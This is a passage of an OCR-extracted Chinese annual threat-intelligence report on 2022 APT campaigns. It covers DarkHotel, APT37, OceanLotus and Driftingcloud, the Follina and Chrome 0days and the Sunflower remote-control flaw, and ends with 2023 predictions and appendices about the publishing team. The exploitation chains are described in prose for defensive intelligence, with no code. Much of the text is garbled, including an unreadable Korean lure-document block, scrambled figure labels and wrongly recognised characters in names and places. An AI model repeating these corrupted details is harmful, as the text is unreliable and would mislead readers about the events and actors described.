4. 一 个 阶段 失败 ， 直 接 放 弃 攻击 


同样 是 2022 年 年 初 ，360 捕获 了 东北 亚 地 区 另 一 APT 团伙 DarkHotel 使 用 FireFox 0day CVE-2022- 
26485、CVE-2022-26486 的 水 坑 攻 击 事 件 。 


此 外 ，2022 年 10 B, Google 的 威胁 分 析 小 组 (TAG) 发 现 一 起 针对 韩国 的 在 野 0day APT 攻击 事件 ， 
攻击 中 投递 了 韩国 梨 泰 院 事件 的 诱 乌 文 档 ， 该 文档 下 载 了 一 个 RTF 远程 模板 ， 该 模板 又 获取 远程 HTML 
页 面 。 由 于 Office 使 用 Internet Explorer (IE) 呈现 此 HTML 页 面 ， 从 而 触发 了 Internet Explorer 浏览 
器 JavaScript 引擎 中 的 0day 漏洞 CVE-2022-41128， 最 终 导致 远程 代码 执行 。Google 威胁 分 析 小 组 将 
该 攻击 事件 归属 于 APT37。 


SAF OAA AD Aag | sve 
EET 
- 2022. 10. 31(8506:00 98A - (044-205-1710) 


NE 号 女子 ogg AD HAPEE AA Sape SI Ag 3x:10.30), 


uem 


1223] 
es i 32528 其 早 对 Qs 夺 SUE udsTSzMA 7H 
WER Ape X ARBA EAS 
9:22.10.29.(5) 22:15 d AS 号 世子 OHA 173-7 Sl 2l e e el 8l 己 
AA Ha WAE A LUE A AARAA AH H 
Api eH ES) 
o AZ: & 303 ZAY 154, FA 149%) * S531 24 116 
Page 1 05 ü T m UNS m - 1 E m 
A. El 4.4 APT37 攻击 诱饵 文件 
东亚 地 区 一 直 以 来 都 是 全 球 政治 地 缘 纠纷 的 热点 地 区 之 一 ， 这 也 导致 该 区 域 不 断 出 现 APT 攻击 事件 ， 而 


双方 这 种 高 对 抗 的 情况 ， 也 使 得 0day 漏洞 的 使 用 规模 不 断 升级 。 


—. BHE: 远程 管理 工具 沦 为 黑客 组 织 后 门 


向 日 葵 是 一 款 国 内 流行 的 远程 控制 管理 工具 ， 其 支持 远程 控制 电脑 手机 、 远 程 管 理 、 内 网 穿 透 等 功能 。 
2022 年 2 月 ， 该 软件 Windows 版 本 被 曝光 存在 远程 命令 执行 漏洞 ， 并 出 现在 野 利 用 。 其 本 质 上 利用 了 
向 日 葡 对 外 开启 的 一 处 危险 接口 , 获取 到 一 个 默认 的 CID, 从 而 配合 后 续 的 一 处 命令 注入 触发 代码 执行 。 
由 于 很 多 企业 的 安全 意识 不 足 ， 将 向 日 葵 的 接口 主动 曝露 在 公 网 ， 在 漏洞 公开 后 ， 大 量 企业 受到 了 攻击 ， 
包括 挖 矿 、 勒 索 、 僵 尸 网 络 等 ， 其 中 海 莲花 曾 多 次 利用 该 漏洞 进行 攻击 。 
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=. loT 路 由 器 等 成 为 APT 团伙 攻击 的 前 哨 站 


APT 团伙 攻击 时 往往 需要 隐藏 自身 回 连 C2 服务 器 ， 以 防止 后 续 安全 人 员 的 溯源 。2022 年 ， 奇 安信 红 雨 
滴 团队 捕获 到 多 起 海 莲花 攻击 loT 路 由 / 防火 墙 设备 的 事件 。 该 团伙 通过 近 两 年 披露 的 一 些 路 由 / 防火 
墙 nday 漏洞 ， 对 外 网 上 没有 修复 的 路 由 / 防火 墙 设备 进行 攻击 ， 或 将 入 侵 的 路 由 设备 作为 木马 回 连 C2 
服务 器 的 中 转 跳板 ， 从 而 隐藏 自己 真实 的 C2 服务 器 地 址 ， 或 通过 攻陷 的 防火 墙 设 备 进 入 目标 内 网 。 此 
类 手法 已 经 成 为 当下 海 莲花 团伙 的 标 配 攻击 手段 。 


四 、Driftingcloud: 一 个 新 的 Oday 漏洞 利用 团伙 


Volexity F 2022 年 6 月 分 别 披露 了 两 起 定向 攻击 事件 ， 这 两 起 攻击 中 都 使 用 了 Oday 漏洞 ， 其 中 一 个 漏 
洞 CVE-2022-26134 为 Atlassian Confluence Sever 中 未 经 身份 验证 的 远程 代码 执行 ， 另 一 个 则 是 针对 
Sophos 防火 墙 的 远程 代码 执行 漏洞 CVE-2022-1040。 当 通过 漏洞 攻陷 Sophos 防火 墙 后 ， 攻 击 者 利用 
对 防火 墙 的 访问 权限 修改 了 针对 特定 目标 网 站 的 DNS 响应 ， 以 实现 MTM 攻击 ， 这 使 攻击 者 能 从 对 网 
站 内 容 管理 系统 (CMS) 的 管理 访问 中 拦截 用 户 凭 据 和 会 话 cookie， 并 以 此 进行 后 续 的 攻击 。 


Li Attacker breaches PHASE 3 
firewall & installs Attacker performs MITM on 
FAN a webshell connections to websites 


on which the victim is an admin 


PHASE 2 
Attacker adds a VPN 
account & initiates 
DNS interception 


| 
CUSTOMER NETWORK 
志 一 一 一 一 一 一 个 一 一 一 一 一 一 一 


WR 00 p PF A 人 站 


Attacker uses stolen 
credentials & session cookies 
to further breach webservers 


U. 


A. 图 4.5 Driftingcloud Oday 漏洞 攻击 流程 


五 、 绕 过 Office 文档 保护 视图 : CVE-2022-30190 


该 漏洞 最 早 由 安全 人 员 通 过 VirusTotal 发 现 ， 并 命名 为 Follina。 漏 洞 利用 和 去 年 的 CVE-2021-40444 有 
很 多 相似 之 处 ， 通 过 OLE 远程 拉 取 一 个 恶意 HTML, iE HTML 中 使 用 MSDT 协议 绕 过 了 Office 自 带 的 
保护 视图 。 后 续 发 现 微软 实际 上 在 攻击 不 久 前 就 已 经 党 试 修复 该 问题 ， 但 是 依旧 存在 rtf 文件 格式 绕 过 
的 问题 ， 最 后 通过 MSDT 协议 中 的 一 处 Powershell 注入 导致 最 终 的 代码 执行 。 
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Z| 4.6 CVE-2022-30190 漏洞 利用 


该 攻击 样本 被 披露 两 天 之 后 ， 便 被 TA413 用 于 实际 的 鱼 叉 邮 件 攻击 ， 之 后 APT28 组 织 也 在 针对 乌克兰 
的 攻击 中 使 用 了 该 漏洞 。 但 是 由 于 该 漏洞 最 终 通 过 MSDT 的 方式 利用 ， 导 致 漏洞 披露 之 后 ， 样 本 非常 容 
易 查 = 7. 杀 。 


六 、 强 大 的 Chrome 生态 ， 更 多 的 漏洞 


随 着 微软 放弃 自 研 EDGE， 转 而 直接 使 用 Chrome 内 核 ，Chrome 浏览 器 的 在 野 0day 攻击 就 一 直 居 高 
不 下 ， 毕 竟 Chrome 已 经 成 了 现在 非 苹果 生态 外 最 大 的 浏览 器 攻击 面 。2022 年 Chrome 浏览 器 的 在 野 
Oday 相 较 去 年 有 所 降低 ， 但 也 依旧 有 9 个 之 多 。 从 去 年 开始 ， 攻 击 者 对 于 Chrome 的 攻击 就 逐渐 从 V8 
引擎 转 为 过 去 更 少 被 人 关注 的 模块 ， 而 随 着 wasm-memory-protection-keys 标记 开始 启用 ， 攻 击 者 和 
Chrome 浏览 器 之 间 的 对 抗 也 愈 发 激烈 。 


值得 关注 的 是 ， 相 较 于 往年 Chrome 浏览 器 的 在 野 0day 几乎 都 由 谷歌 安全 人 员 捕 获 ，2022 年 安全 厂 
商 Avast 也 加 入 了 这 一 行列 。 但 是 对 于 其 背后 攻击 者 的 归属 却 依旧 是 威胁 研究 的 一 大 难题 ， 今 年 9 个 
Chrome Oday 的 攻击 事件 中 ， 只 有 一 起 被 明确 归属 来 自 于 军火 商 Candiru。 而 越 来 越 多 网 络 军火 商 的 介 
入 ， 注 定 Chrome 浏览 器 仍 将 是 未 来 几 年 攻防 双方 的 必 争 之 地 。 


七 、 国 产 之 筋 


2022 年 11 月 ， 威 胁 情报 中 心 在 日 常 的 威胁 监控 中 发 现 一 起 针对 国内 重点 单位 的 攻击 事件 ， 攻 击 者 通过 
国内 某 安 全 厂商 的 内 网 安全 管理 系统 中 存在 的 一 处 远程 命令 执行 漏洞 ， 控 制 了 目标 单位 内 网 中 的 安全 管 
理 系统 ， 并 将 后 续 的 攻击 代码 伪装 成 安全 更 新 下 发 。 
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第 五 章 2023 年 高 级 持续 性 威胁 预测 


我 们 基于 2022 年 APT 威胁 的 态势 以 及 近年 来 APT 威胁 组 织 和 活动 的 变化 情况 对 2023 年 高 级 持续 性 威 
胁 进行 预测 。 


一 、 受 地 缘 政 治 冲 突 影响 ，APT 攻击 活动 持续 加 剧 


2022 年 全 球 局 势 不 断 趋 于 紧张 ， 不 少 存在 地 缘 政治 冲突 的 地 区 走向 对 抗 的 态势 。 受 国家 利益 驱使 ， 全 
球 的 APT 组 织 将 更 加 活跃 ， 尤 其 是 针对 政府 、 外 交 、 国 防 军事 行业 的 定向 攻击 仍 将 处 于 高 位 ， 攻 击 者 或 
将 以 更 频繁 的 攻击 、 更 隐蔽 的 手段 窃取 这 些 行 业 的 情报 机 密 。 


二 、 对 受害 国 本 土 软件 的 漏洞 利用 愈加 频繁 


由 于 主流 软件 得 到 全 球 范围 的 充分 关注 ， 对 此 类 产品 的 漏洞 利用 在 复杂 度 、 时 间 与 金钱 成 本 上 都 比较 高 。 
虽然 主流 软件 产品 的 0day 作为 APT 组 织 的 大 杀 器 会 长 期 存在 ， 但 根据 2022 年 的 攻击 活动 ， 我 们 推测 
对 受害 国 本 土 软件 的 漏洞 利用 将 成 为 具有 一 定 技术 能 力 的 APT 组 织 的 常规 手段 。 本 土 软件 由 于 使 用 人 群 
有 限 ， 关 注 度 较 少 ， 利 用 成 本 相对 较 低 ， 并 且 更 加 具有 针对 性 ， 对 它们 的 漏洞 利用 在 未 来 的 APT 攻击 活 
动 中 可 能 会 更 加 频繁 地 出 现 。 


三 、 瞄 准 关 键 基础 设施 的 破坏 越发 泛滥 


平常 时 期 APT 攻击 对 关键 基础 设施 的 攻击 主要 着 眼 于 建立 长 期 访问 据点 ， 获 取 敏 感 信息 。 而 非常 时 期 这 
些 入 侵 活动 就 会 转变 成 破坏 性 攻击 ， 瘫 痪 关键 基础 设施 的 功能 ， 甚 至 影响 社会 运转 。 俄 马 冲 突 期 间 ， 乌 
克 兰 境内 的 卫星 通信 服务 商 遭 受 数据 探 除 攻击 ， 导 致 通信 服务 中 断 。Sandworm 组 织 试 图 借助 针对 工控 
设备 的 恶意 软件 和 多 种 数据 擦 除 器 ， 破 坏 马 克 兰 某 电 力 供应 商 的 变电站 与 电网 。 这 些 攻击 事件 给 我 们 敲 
响 和 警钟 ， 在 局 势 紧张 的 背景 下 ， 针 对 关键 基础 设施 的 网 络 攻击 将 只 多 不 少 。 
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四 、 各 类 新 型 钓鱼 攻击 活动 将 频繁 出 现 


长 期 以 来 APT 组 织 最 常 使 用 且 攻 击 效果 明显 的 攻击 手法 为 鱼 叉 邮件 ， 而 随 着 人 们 安全 意识 的 提高 ，APT 
组 织 开 始 寻 求 新 型 钓鱼 技巧 ， 结 合 更 多 的 社会 工程 学 手段 。 

例如 ，Phosphorous 组 织 为 了 与 新 目标 建立 更 深 的 信任 ， 窃 取 受 害 者 邮箱 账户 后 ， 动 持 受 害 者 现 有 的 电 
子 邮件 对 话 ， 伪 装 为 受害 者 的 身份 ， 从 目标 和 受信 任 方 之 间 已 经 存在 的 电子 邮件 对 话 开始 攻击 ， 并 以 此 
为 由 子 继续 钓鱼 。 


另外 , Charming Kitten 会 使 用 多 个 角色 和 电子 邮件 帐户 , 诱导 目标 认为 这 是 一 个 真实 的 电子 邮件 对 话 。 
研究 人 员 将 这 种 社会 工程 技术 称 为 “多 角色 模拟 ” (MPI) ， 这 样 的 技术 提高 了 钓鱼 邮件 的 真实 性 ， 令 
受害 目标 难以 分 辨 真 假 。 
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附录 2 奇 安信 威胁 情报 中 心 


威胁 情报 中 心 是 奇 安 信 集 团 旗 下 专注 于 威胁 情报 收集 、 分 析 、 生 产 的 专业 部 门 ， 以 业界 领先 的 安全 大 数据 
资源 为 基础 ， 基 于 奇 安信 长 期 积累 的 威胁 检测 和 大 数据 技术 ， 依 托 亚太 地 区 顶级 的 安全 分 析 师 团队 ， 通 过 
创新 性 的 运营 分 析 流 程 ， 开 发 威胁 情报 相关 的 产品 和 服务 ， 输 出 威胁 安全 管理 与 防护 所 需 的 情报 数据 ， 协 
助 客户 发 现 、 分 析 、 处 置 高 级 威胁 活动 事件 。 


奇 安信 ALPHA 威胁 分 析 平 台 (https://ti.qianxin.com) ， 是 奇 安信 集团 面向 安全 分 析 师 和 应 急 响 应 团队 提 
供 的 一 站 式 云端 服务 平台 ， 该 平台 拥有 海量 互联 网 基础 数据 和 威胁 研判 分 析 结 果 ， 为 安全 分 析 人 员 及 各 类 
企业 用 户 提 供 基础 数据 的 查询 、 攻 击 线索 拓展 、 事 件 背景 研判 、 攻 击 组 织 解析 、 研 究 报 告 下 载 等 多 种 维度 
的 威胁 情报 数据 与 威胁 情报 服务 ， 提 供 全 方位 的 威胁 情报 能 力 。 


TRR Apnc 威胁 分 析 武 器 库 


E ES 中 
Sismick dem =ziPt Rss SIRERE Beta 

e. Ë Eè 
pratike APT 样 本 自动 化 检测 器 样本 启动 化 分 析 

ES & e 
SRTR PCAP 自 动 化 分 析 邮件 批量 自动 化 榨 列 

me ei Bam 
€ È 


奇 安信 威胁 情报 中 心 奇 安信 病毒 响应 中 心 


74 2022 年 度 报告 


《te 》 奇 安信 威胁 情报 中 心 
附录 3 红 雨 滴 团 队 (RedDrip Team) 


持续 运营 奇 安信 威胁 情报 中 心 至 今 ,专注 于 APT 攻击 类 高 级 威胁 的 研究 , 是 国内 首 个 发 布 并 命名 “ 海 莲花 ” 
(APT-C-00，OceanLotus) APT 攻击 组 织 的 安全 研究 团队 ， 也 是 当前 奇 安信 威胁 情报 中 心 的 主力 威胁 分 
析 技 术 支 持 团 队 。 


目前 ， 红 雨滴 团队 拥有 数 十 人 的 专业 分 析 师 和 相应 的 数据 运营 和 平台 开发 人 员 ， 覆 盖 威 胁 情 报 运营 的 各 个 
环节 : 公开 情报 收集 、 自 有 数据 处 理 、 恶 意 代 码 分 析 、 网 络 流量 解析 、 线 索 发 现 挖掘 拓展 、 追 踪 溯 源 ， 实 
现 安全 事件 分 析 的 全 流程 运营 。 团 队 对 外 输出 机 读 威 胁 情报 数据 支持 奇 安信 自 有 和 第 三 方 的 检测 类 安全 产 
品 ， 实 现 高 效 的 威胁 发 现 、 损 失 评估 及 处 置 建议 提供 ， 同 时 也 为 公众 和 监管 方 输出 事件 和 组 织 层面 的 全 面 
高 级 威胁 分 析 报 告 。 


依托 全 球 领先 的 安全 大 数据 能 力 、 多 维度 多 来 源 的 安全 数据 和 专业 分 析 师 的 丰富 经 验 ， 红 雨滴 团队 自 
2015 年 持续 发 现 多 个 包括 海 莲花 在 内 的 APT 组 织 在 中 国境 内 的 长 期 活动 ， 并 发 布 国内 首 个 组 织 层面 的 
APT 事件 揭露 报告 , 开创 了 国内 APT 攻击 类 高 级 威胁 体系 化 揭露 的 先河 , 已 经 成 为 国家 级 网 络 攻防 的 焦点 。 


“ 红 雨 滴 ” 背 后 的 故事 一 “从 100 亿 个 雨滴 中 找 一 个 红 雨 滴 ” 


2006 年 11 月 20 日 , 因 发 现 J 粒 子 而 获得 诺 贝 尔 奖 的 著名 华裔 物理 学 家 本 肇 中 教授 来 到 中 国 驻 瑞 士 大 使 馆 ， 
做 了 一 场 精 彩 的 讲座 。 丁 秘 中 教授 形容 自己 发 现 构 成 物质 的 第 四 种 基本 粒子 一 一 J 粒子 的 高 精度 实验 时 说 
到 : “相当 于 在 北京 下 雨 时 ， 每 秒 钟 有 100 亿 个 雨滴 ， 如 果 有 一 个 雨滴 是 红色 的 ， 我 们 就 要 从 这 100 亿 个 
里 找 出 它 来 。” 


而 奇 安信 威胁 情报 中 心 高 级 威胁 分 析 团 队 同样 需要 在 海量 数据 中 精准 找寻 那些 红色 威胁 。 最 终 ， 我 们 选择 
了 “ 红 雨 滴 ” 作 为 团队 的 名 称 。 
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